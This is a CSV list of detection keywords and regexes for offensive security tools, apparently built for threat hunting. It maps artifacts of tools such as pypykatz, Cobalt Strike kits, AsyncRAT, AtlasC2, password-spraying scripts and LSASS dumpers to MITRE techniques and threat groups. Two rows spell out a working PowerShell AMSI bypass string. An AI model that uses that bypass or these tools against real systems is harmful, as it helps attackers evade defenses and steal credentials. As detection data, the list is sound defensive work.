"*asreproast_*.txt*",".{0,1000}asreproast_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","34133"
"*asreproast_john_results_*",".{0,1000}asreproast_john_results_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","34134"
"*asreproast_output_*.txt*",".{0,1000}asreproast_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","34135"
"*ASREProastables.txt*",".{0,1000}ASREProastables\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","34136"
"*ASreproasting.txt*",".{0,1000}ASreproasting\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","34137"
"*asreproasting.x64*",".{0,1000}asreproasting\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","34138"
"*ASRepToHashcat*",".{0,1000}ASRepToHashcat.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","34139"
"*Assemblies/SharpMove.exe*",".{0,1000}Assemblies\/SharpMove\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","N/A","10","7","666","109","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z","34141"
"*assembly AMSITrigger *",".{0,1000}assembly\sAMSITrigger\s.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","N/A","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","34142"
"*Assembly.GetType(""System.Management.Automation.AmsiUtils"").getField(""amsiInitFailed""*'NonPublic*Static').SetValue($null*$true)*",".{0,1000}Assembly\.GetType\(\""System\.Management\.Automation\.AmsiUtils\""\)\.getField\(\""amsiInitFailed\"".{0,1000}\'NonPublic.{0,1000}Static\'\)\.SetValue\(\$null.{0,1000}\$true\).{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","34143"
"*Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed'*'NonPublic*Static').SetValue($null*$true)*",".{0,1000}Assembly\.GetType\(\'System\.Management\.Automation\.AmsiUtils\'\)\.GetField\(\'amsiInitFailed\'.{0,1000}\'NonPublic.{0,1000}Static\'\)\.SetValue\(\$null.{0,1000}\$true\).{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","PowerShell AMSI Bypass","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","34144"
"*ASSEMBLY_PUBLIC_KEY*136e5fbf23bb401e*",".{0,1000}ASSEMBLY_PUBLIC_KEY.{0,1000}136e5fbf23bb401e.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","0","#content","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","34145"
"*--assemblyargs AntiVirus AppLocker*",".{0,1000}\-\-assemblyargs\sAntiVirus\sAppLocker.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","34146"
"*Assets/solution/dllmain.cpp*",".{0,1000}Assets\/solution\/dllmain\.cpp.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","34147"
"*AssmblyLoader*",".{0,1000}AssmblyLoader.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","34150"
"*AsStrongAsFuck.exe*",".{0,1000}AsStrongAsFuck\.exe.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","34159"
"*AsStrongAsFuck.py*",".{0,1000}AsStrongAsFuck\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","34160"
"*Async RDP Client. Duckyscript will be executed by pressing ESC 3 times*",".{0,1000}Async\sRDP\sClient\.\sDuckyscript\swill\sbe\sexecuted\sby\spressing\sESC\s3\stimes.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","34163"
"*async_webshell-all.py*",".{0,1000}async_webshell\-all\.py.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","34164"
"*AsyncRAT  Simple RAT*",".{0,1000}AsyncRAT\s\sSimple\sRAT.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","N/A","N/A","10","10","2484","754","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z","34165"
"*AsyncRAT Server*",".{0,1000}AsyncRAT\sServer.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","#certificate","default cert name","10","10","2484","754","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z","34166"
"*AsyncRAT.exe*",".{0,1000}AsyncRAT\.exe.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","1","N/A","N/A","10","10","2484","754","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z","34167"
"*AsyncRAT/DCRat*",".{0,1000}AsyncRAT\/DCRat.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","34168"
"*asyncssh_commander.py *",".{0,1000}asyncssh_commander\.py\s.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","N/A","10","10","76","16","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z","34169"
"*asyncssh_commander.py*",".{0,1000}asyncssh_commander\.py.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","N/A","10","10","76","16","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z","34170"
"*atexec.py*",".{0,1000}atexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","34176"
"*Athena.Forwarders.SMB*",".{0,1000}Athena\.Forwarders\.SMB.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","34177"
"*athena/agent_code/*",".{0,1000}athena\/agent_code\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","34178"
"*AthenaPlugins.csproj*",".{0,1000}AthenaPlugins\.csproj.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","34179"
"*AtlasC2*APIModels*",".{0,1000}AtlasC2.{0,1000}APIModels.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","N/A","10","10","211","41","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z","34193"
"*AtlasC2*Client*",".{0,1000}AtlasC2.{0,1000}Client.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","N/A","10","10","211","41","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z","34194"
"*AtlasC2*implant*",".{0,1000}AtlasC2.{0,1000}implant.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","N/A","10","10","211","41","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z","34195"
"*AtlasC2*TeamServer*",".{0,1000}AtlasC2.{0,1000}TeamServer.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","N/A","10","10","211","41","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z","34196"
"*AtlasC2.exe*",".{0,1000}AtlasC2\.exe.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","N/A","10","10","211","41","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z","34197"
"*AtlasC2b.exe*",".{0,1000}AtlasC2b\.exe.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","N/A","10","10","211","41","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z","34198"
"*AtlasC2b.sln*",".{0,1000}AtlasC2b\.sln.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","N/A","10","10","211","41","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z","34199"
"*AtlasImplant.yar*",".{0,1000}AtlasImplant\.yar.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","N/A","10","10","211","41","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z","34200"
"*AtlasReaper.exe*",".{0,1000}AtlasReaper\.exe.{0,1000}","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","N/A","3","3","255","28","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z","34201"
"*AtlasReaper-main*",".{0,1000}AtlasReaper\-main.{0,1000}","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","N/A","3","3","255","28","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z","34202"
"*atmail2john.pl*",".{0,1000}atmail2john\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","34203"
"*atomizer imap *",".{0,1000}atomizer\simap\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","34204"
"*atomizer lync *",".{0,1000}atomizer\slync\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","34205"
"*atomizer owa *",".{0,1000}atomizer\sowa\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","34206"
"*atomizer.py -*",".{0,1000}atomizer\.py\s\-.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","34207"
"*atomizer.py imap *",".{0,1000}atomizer\.py\simap\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","34208"
"*atomizer.py lync *",".{0,1000}atomizer\.py\slync\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","34209"
"*atomizer.py owa *",".{0,1000}atomizer\.py\sowa\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","34210"
"*AtomLdr.dll*",".{0,1000}AtomLdr\.dll.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","N/A","8","712","91","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z","34211"
"*AtomLdr.sln*",".{0,1000}AtomLdr\.sln.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","N/A","8","712","91","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z","34212"
"*AtomLdr.vcxproj*",".{0,1000}AtomLdr\.vcxproj.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","N/A","8","712","91","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z","34213"
"*AtomLdr-main.zip*",".{0,1000}AtomLdr\-main\.zip.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","N/A","8","712","91","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z","34214"
"*ATPMiniDump*",".{0,1000}ATPMiniDump.{0,1000}","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","1","N/A","N/A","N/A","3","255","46","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z","34215"
